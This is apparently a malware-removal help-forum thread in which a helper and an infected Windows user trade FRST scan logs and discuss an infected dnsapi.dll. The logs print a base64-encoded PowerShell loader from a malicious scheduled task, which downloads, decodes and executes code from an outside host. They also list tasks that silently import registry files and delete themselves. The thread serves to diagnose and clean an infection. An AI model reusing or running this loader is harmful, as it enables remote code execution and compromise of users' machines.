AeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEIAVQBUAG0AMwBSAGYAOAAwAHUANABrAEsAVwByAEUAeQBQAHcASwBXAEwAdwBJAHQAWQBlAHAAbQBvAFIAVABIAEkAUABQAC0AawB1AEsAMQBiAFYARABmAHMAWQBUAHcAeQBZAHMAbABTAGYARQBZAGYAOABWAEwATQAwADkAXwAwAF8AZAA2AEsAYwBZAEIANgAyAEwAcwBFAG8ANgBDAHcAbABtAFIAUAAxAEEAMwBSAHEANwBiAEIAbQB2AGcALQBBAGEAVwBxAFcAYgBkAFkANABsAHIATgBCAGwATABYAG8AMAB3ADEAYwBOAGwAaABtAGYAYwBxAGkAYwBmAGgAagBLAHkAaQBGAGUALQBfADkAUgBjADIAcAA3AE4AUgA5AFoAZgBRAF8AegBNAGkANwBUAFoATgBWAEMAWgBaADQANQBYAHEAZABUAEQAWgBxAGUAawB4AFEASgBTAHMARABiAEwAbABxAC0AWABaAGQASwBxAEsAdQB4AGwATwBrAEUAbABVAEwAawBoAGwAcgBhAGYAVABtADUAQwBuAHEAYgBWAE0AcwBYAC0AYgB2AF8AMQBvADYASQBNAFIANQBJAFgAVgBTAGsAWABiAE4ANgBMAGkAcgBsAHYANwBZAE0AdQAxADEAegB1AGUAdQB0AFEATQA1AHcAcgBDAGgALQBqAGkANgBkAHkAYQBRAEQAdQBOADAAeABtAHIAVABrAHAATAB0AHoASwBRAGoAeABwAG4AYgBiAHcAWQBPAFMAVgBJAEsAMgBOAFoAYQBEAFgAdAA5AGoAXwBvAE4ASQB1AE0AZwAzADAAVQA4AFUARAByAE0ATQBhADMANgBiAFQAVwBBAGUARQBoAGcAdQBuAFEAMgB4AEUAeQBsAEgAdgBXAHIATgBrAC0AWQBDAE4AWQBtAFAAegB4AHEAVQA0AHcARQBGADkAUgBsAGYAcgBaADgAQgBEADgAZgBHAHoAMwAwADIAbABfAEMAMABDAHAAZwB0ADYAOQBaAEMAYgBFAEcAZwA3AC0AOAA3AEIAWABvAHIAcgA4AFkAbABXAFYAQgA5AGYANAB0AGQAZgBQAHAAOQByADgAXwA0AEcARgBzADgAQQA5AGEAOQBoAFgAcwB3AGUAcwBFAHgAcwBnAHUAQwBnAGEAZgBvAEsAVQB6AEgAVwBsAGsAUQBzAFQAdgB5AFAAUgBiAE0AbgBlAEEARABJAG8ASAAyAEkAWAA1AEsALQBNAGQASQBkAHcAdwAzAGkAdAA4AFMAOABSAEkAbABMAGsAUQBhAHcAegByAGsAZgBkAG8AUQB0AHgAcgBrADEAQwBoAGkAVAAzADEAQgBoAGoAXwBIAHkAWgBWADkAZABjAFQAbgBJADIAMgBwAE4ARQBjADMAMgBFAHIAeQA2AE0AdgBSAEwAWgBIADkAaABuAHcATQBjAHAAYgAxAEcARgA2ADIAQQBUAHEARwBiAC0AdgBIADIAeQBNAEcAMQBzAHoAcgBtAFEAZQBaADcANABBAFkAQQBkAE4AOQBvAFkAWAA2AHIAbABoAGcAMQBwAFoATQBFAGYAMgBNAGgAdwBRAHMAcQBjAFAAagBwAGsAeQBoAFgAegB4AFMAbwBzAHUAagB5AEgAeQBFAFcAZwBxADUAbgBZAHgAMQBLAHEARwB1AG8AYwB2AE8AdgByAHAAcgBmAGwAZgA5AFcAcgBMAEYAagBWAG8AcQBQAHcAbQA2AC0ASgBmAEcAVwBWAGoAVgAzAFoAOQBVAEEAQwBaAHMASwB2AGcASAB3AEkAeQBxAFIAWgBtAGcANgBJAHIAcwA2AGgAeABCAHUASQA3AGcAVQBWAEcANgBQAEcAUABhAE0AdwBDAHkAcgAwAEMAWQB5AFAAWQBYAFYAQgB0AGwAcQBCAF8ASABNAEQARwBnAFAAdABhAGkAcAB2AEkAcwA4AFkATwBEAGYAUQBLAGwAegBwAHkAZABSAGQAQwAzAE4ATgBhADMAWAA5AHoAMQBPAHUAaQBzAHIAVQBDAGIARABvAE4AOQB5AG0AUgBOAEwAVwBDADcATgBEAFMAcwBGADUAYQBnADQAcQBzAE4AMABfAEIASQB1AGwARgBzADcAcgA0ADQAeQBoADEAaAByAHMAUwAyADkASABKAHIANgB5AGMAaQBHAFcAVgBaAFcAaQBMAHEAUABnAEEAbwA0AGoAMwA4AG0AZgBqAE8ARAA3AGoAMQBqADQAYgBqAFMAZQBBADAAeABmAG8AMABLAEYAZABoAEIARABTAHcATQBoAG8AZABjAEoAZQAxAE0ASQBWAFYATQAxAFIAaABEAEIAMAA1AHYATgAmAGMAPQBrAGoAQQBpADMAeABrAHEAegB2AGsAcgAxAFAAcABNAGkAcABfAEgAUgBkAEsARABkADQAZABPAGMAUQBuAFMAUQBMAF8ALQB5AHYAQwBwAG4AegBsAFoAYgBqADIAVABxADgAYgBsADQAcABuAEQAYgAyADYASwBKAHAAYwBPAEkAcgBUAFoARABhAC0ATQBEADcAegBwAHMARgAyAFgAcABlAE8AeQBwADYAbwBXAFEASQBWAGwATQBPAGsATAA1ADkASwBDAG4AbwA0AGEATQBZADgAbgA4AGoAegBQAFYAWgBXAFEAQgAzADkAZgBfAGcAcgBzAG4ALQA5AFoALQBKAEEAUQAtAFMANgBXADUAcABYAGQAZwBKAEEAZABvAFgAWQA3AGgARABjADEATQBjAEUASwBUAGkANQBrAE8ANQBuAGEAcgB1AHYAagBsAHQASQB5AFQARQBXADUALQBtAEwATwBGAGYASgB4AHcAWABoAGcAaAA0AGkAWQBsAGsAZQAyAHIAMgBLAFEARwBqAEIAbABoAFEAZABzAE0ANgB3AFgAYQAzAHoAWABVAHgARABkADkAbAA2AHQAeAAyAG4ANQA0AG8ANQA5AHEAMABmADcAaABJAFQAUgBHAGwAOQBnAHQANgBBAFMAMABMADAAOQBMAGEAbQBVAEcAZQBRAHkAZQBZAFcAcABoAFUAMQBDAHMAdwBEAGwAdgAzAFEAXwAtAFQATwBZAGMAdAB5AE8AUQA4AGIAOAAtAEIAWgBTAEsARwBFAGsASgA0AHUAOABfADgAVgAzAHoASwBvAHQASABZAEMAMQA5ADgAZQByAHkAagB1ADcAQwAxADEAUQBVAEkAbAA1AFUAQwAzAHQAdwBFAG0AUABGAEoAOAA0AFEAaABFADQARQB6AHYAVQBXAHUAOABFAG4AZQBNAGsAawBrADAAcwBNAFUAeABTAG4AcwBOAGEAZwBaAEcAcQA2AHUAOABqAHEAMQB4AGIAZgBpAGcAegBYAFIAZgBzADUAVgBLAEYAOABIAEgANgA5AEoAUwB0AGMAbQBhAG0ANQBrAGIANwBPADgANgBGAFUAaQBrAEMAQQBPAGwAaAA1AGQARABkAGcAQQB3AF8AbgByAGMAdQA4AEsAbwBEAHoAZwBvAFYASgBLAEwAZQBsADYATABlAFcAVAAyAGUAZgA5AGYARwByAFcAOQA2ADkASAB2AC0ASwB4AHEAcQBhAEMAUwBVADkAcwBOAFEATwBCAHcAeABoADMAWABYAFUANQBBAHMAZgBlAGkAQQA2AE8ARQA2ADQAdABMAHcAZQBIAEcAMgBDAFYATQA0AG0AUwBTAGEAVQBmADAAUgB0AGcAYQAzAGgAVgBIADEAdAB4AEcAZgAtAE0AdQBtAGMAVwAxAEYAeQA4ADUAbQBPAHEAYgBxAEgASQAzADkAeQB6AGMATQBpAHkAOQBRAGUARQBaAE0ARwBUAEoAeQByAE4AZAA1AG4AMwBqADUAcABpAGEAagBCAHAANgBRAGEAUgBrAHAAbABhAGwAZQBfADAAUgBWAHQAbwBTAEoAcgAtAFEAbwBFAHMAYgBwADUAdgBuAEQASQBJAGgAdABjAHQATwBlAEsAaQBsAEYAVAA0ADgAeABXADgARgBzAGMAegBoAGIARwBkAHQANQBlAFMAMABnAG4AcQBtAG4ARQBLAGwARwBqAEcAWABxADUARABWAHAATwBqAEQAdQBDAFoAZAB4AHEAUwBkAFgAcABzAFYATQB2ADIAQgBqAFAAMgBfAGsATwB1AFIAQwA2ADYAbABHADMAZgBGAE4AUQBUAHYAUABaAFkAVQBNAGkAUwAwAFEAZABkADYATAAtAHgAbQA3AGsATgA5AEQANQBVAEYAXwBGAFUAdwBrAEwASwBFADgARQB5ADYAaABhAE8ARABjAFgAVgBaAHcAcwAyAFkAUABtAEEALQBCAGgAOQBOAGUAOABQAGYAdgBtADEAegA0ADkAVgAxADcAdABBADAATQBoAEMAUwBzADAAQQBZAFMAaQBGAGoAbABlAEkAbgA4ADIATwByAHAAYQBmADgARgB1AEwARgBDAHQAeABJAHoANABXADAAbQB0AHAAUABRAFMAdwBSADQASgB5AGEAUABXAEoAVgBMAGYAMABxAEsAdwBxAFQALQByAFkAVABQAFkAYwBvAFcAdQBIAGYAcwBRAEcASABYAEgAaQBBAFkAQQBfAHcAMQBSAFEAdgBOAG4AWgB2AEEAbQBJADcAeQBQAGYAYgBoAFAAaQBhAEMARAB4AFgAZAB5AFQAbQBqAE4ARwBYAG4AbwBkADMAZgAxADcATQBqAEYATQBFAHoAagA0AF8AbABGAG4AdQBkAGYAeABtAHoAcABXAFEANQBsAGYAMwBIACYAcgA9ADcANwA1ADkAOAA3ADUAMgA5ADMAMwA5ADUANgAzADAANAA1ADQAIgA7ACQAcwB0AHMAawA9ACIAewAwAEQAMABGADcARgA0ADcALQAwAEIANwBBAC0AMAA5ADcARgAtADcARQAxADEALQAwADUAMABBADAAOQAwADQAMQAxADcAOAB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAE8ATABWAFoAUwBTAFEATQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {680E9242-EA06-4B9A-AD7F-3CB4585120DE} - System32\Tasks\psv_Temptough => /c regedit.exe /s "C:\ProgramData\Medlight\Physronwarm.reg" &amp; del "C:\ProgramData\Medlight\Physronwarm.reg" &amp; SCHTASKS /Delete /TN "psv_Temptough" /F <==== ATTENTION
Task: {6A06F2E2-A9E3-4D48-8BA2-0A8D99B9B386} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {7213CECA-856F-49B0-9BE8-1A0D716FF580} - System32\Tasks\GNU_635879831225933307 => C:\Users\owner\AppData\Roaming\SafeWeb\gsw.exe
Task: {775F46EB-0A69-4534-BCF9-78E95CFD1A8E} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
Task: {850B6F24-BFEA-4BDC-BB72-E7C8F2C5D23E} - System32\Tasks\Opera scheduled Autoupdate 1452386042 => C:\Program Files (x86)\Opera\launcher.exe
Task: {86C4588C-6DEB-4673-A725-802728388B8C} - System32\Tasks\WebDnsio2-daily => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {889A02E4-9406-4332-950C-98E052F215FD} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {8941FF4A-455A-4F4B-9F2E-1DCD660A1FDE} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Task Host\taskhost.exe [2016-01-09] (Microsoft)
Task: {92D813B2-AA5B-4A97-93B5-19CC0A69B867} - \One System Care Task -> No File <==== ATTENTION
Task: {9DDA3311-9424-4D32-902F-22A85EE0905D} - System32\Tasks\LSNHDG1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: {A23E1D8E-B2C8-4179-8E36-5F1D94FEB50A} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3773202632-424774445-890114178-1001
Task: {A4561249-F93C-42DD-9156-9C763476AE13} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] ()
Task: {A477CF67-A8F7-4DE2-B002-921BDC79B211} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {A56409DE-600B-4BC0-9A96-DF01E8D4AA28} - System32\Tasks\psv_Tripplezap => /c regedit.exe /s "C:\ProgramData\Medlight\Kay-Ity.reg" &amp; del "C:\ProgramData\Medlight\Kay-Ity.reg" &amp; SCHTASKS /Delete /TN "psv_Tripplezap" /F <==== ATTENTION
Task: {A6208F98-D826-4652-BF83-E7D44CA2A837} - \DNSARCHBOLD -> No File <==== ATTENTION
Task: {AAEA193D-3DD3-4D12-B57E-AD3C71C7F783} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
Task: {AF2DA830-E9A5-4C18-9C70-0913A510B21C} - \One System CarePeriod -> No File <==== ATTENTION
Task: {AFB865ED-9145-4839-81CC-EB2D84F61DFB} - System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412 => C:\Program Files\IIS\iis.exe [2016-01-09] (Microsoft)
Task: {B3552ACF-EA18-40A2-9D83-B3EBA7173A0C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {B62A1854-5E8B-4971-A249-401D4464FF54} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {BBCA6AF3-1387-4A66-837F-B9936560FBB0} - System32\Tasks\Olunnuag => C:\ProgramData\Olunnuag\1.0.7.1\evmihlus.exe
Task: {BD4E8E43-4441-4A4B-8137-BE0060B0F289} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {C0596212-D5EE-44AF-AAAB-07C61EDA0EC5} - \Taplika nise -> No File <==== ATTENTION
Task: {C80AA8E6-C6C0-4160-B234-B2589888E728} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
Task: {CFC03435-6807-4B22-8F28-92616C6160D2} - System32\Tasks\DriverNavigator Scheduled Scan => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: {D0395F3B-097A-47A4-A07D-D3977F7D3FD0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {D1BE1EA4-7412-4A4B-9468-76D0C35F4DE6} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
Task: {D1D5F7D9-DFF0-4F73-BE19-8BA1E5BA3000} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P => C:\WINDOWS\system32\WindowsPowerShell\taskprocess.exe [2016-01-09] (gltstech.net)
Task: {DBE9B34A-58C0-4CC7-B79B-D7498B9DD164} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
Task: {DC75A548-011F-44B6-AE74-CDA52157237D} - System32\Tasks\WebDnsio2 => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {E06DA7D4-9D01-4CBE-80C7-A4BFD6357661} - System32\Tasks\Goose => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll [2016-01-09] (Birds365)
Task: {F975168C-909D-4C2D-8BC0-CFD9AC8553A4} - System32\Tasks\UXJOVQQVBISGUWLJ => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DriverNavigator Scheduled Scan.job => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Goose.job => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job => powershell exe
Task: C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job => powershell exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)
 
On a top of very heavy infection we also have one system file infected so I need to see if we have any healthy replacement.

Re-run FRST again.
Type the following in the edit box after "Search:".

dnsapi.dll

Click Search files button and post the log (Search.txt) it makes in your reply.
 
You missed a part of Addition.txt log just below this:

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)
so I'll need that too.
 
Sorry about the overlap - seems you gave me additional instructions but I didn't get them till after I posted the first log. I'll restart again with your additional instructions. Thx :)
 
So I looked at the Additional text log and there's nothing after it but I'll recopy if you'd like - just advise. Also, I reran it as per your instructions and have the search text log copied first (below) then the next will be the FRST log.

Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 19:22:38)
Running from E:\
Boot Mode: Safe Mode (minimal)

================== Search Files: "dnsapi.dll" =============

C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll
[2015-01-23 12:05][2014-11-04 17:20] 0498688 ____N (Microsoft Corporation) 205BDB00F4C032AF45A6BFD18EA7886C [File is digitally signed]

C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
[2014-11-21 01:16][2015-03-30 20:19] 0000202 ____A () D06D08FC499336D17F6E9F6E05847576 [File not signed]

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll
[2015-01-23 12:05][2014-11-04 17:44] 0657920 ____N (Microsoft Corporation) 0B082D6D7A53D91678E7409DD145E89C [File is digitally signed]

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
[2014-11-21 01:15][2015-03-29 13:33] 0000206 ____A () 056816A63C5C311231348A5F56F0A496 [File not signed]

C:\Windows\SysWOW64\dnsapi.dll
[2015-01-23 12:05][2015-01-23 12:05] 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59 [File not signed]

C:\Windows\System32\dnsapi.dll
[2015-01-23 12:05][2015-01-23 12:05] 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12 [File not signed]

====== End of Search ======
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
Ran by owner (administrator) on ACER (10-01-2016 19:30:04)
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [oasi_en_323010107] => [X]
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
